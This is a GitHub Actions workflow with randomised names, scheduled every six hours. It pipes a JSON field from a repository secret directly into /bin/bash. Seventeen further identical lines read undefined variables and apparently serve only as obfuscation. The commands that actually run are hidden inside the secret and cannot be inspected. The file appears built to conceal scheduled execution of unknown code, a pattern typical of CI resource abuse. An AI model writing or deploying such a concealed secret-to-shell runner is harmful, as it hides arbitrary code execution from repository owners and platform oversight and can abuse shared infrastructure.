name: zonxxki
on:
  workflow_dispatch:
  schedule:
    - cron: '11 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zonxxki
        env:
          pgw0: ${{ secrets.pgw0 }}
        run: |
          echo $pgw0 | jq -r .agyym11760 | /bin/bash
          echo $uqvf85821 | jq -r .nkn05 | /bin/bash
          echo $gbzm4692 | jq -r .xzxx6575 | /bin/bash
          echo $d7 | jq -r .y0265 | /bin/bash
          echo $oczxm3055 | jq -r .id46 | /bin/bash
          echo $xkle72181 | jq -r .yja74302 | /bin/bash
          echo $yir36538 | jq -r .q49878 | /bin/bash
          echo $qs42267 | jq -r .nvskq1 | /bin/bash
          echo $s3 | jq -r .i51222 | /bin/bash
          echo $xvln5196 | jq -r .biw0989 | /bin/bash
          echo $wv5 | jq -r .rye163 | /bin/bash
          echo $ig59 | jq -r .ek6913 | /bin/bash
          echo $htx482 | jq -r .ad71952 | /bin/bash
          echo $fqzmb888 | jq -r .sn6957 | /bin/bash
          echo $rne656 | jq -r .g91 | /bin/bash
          echo $m379 | jq -r .kdco36 | /bin/bash
          echo $dnwuj9 | jq -r .vszm78 | /bin/bash
          echo $y8910 | jq -r .odg8755 | /bin/bash

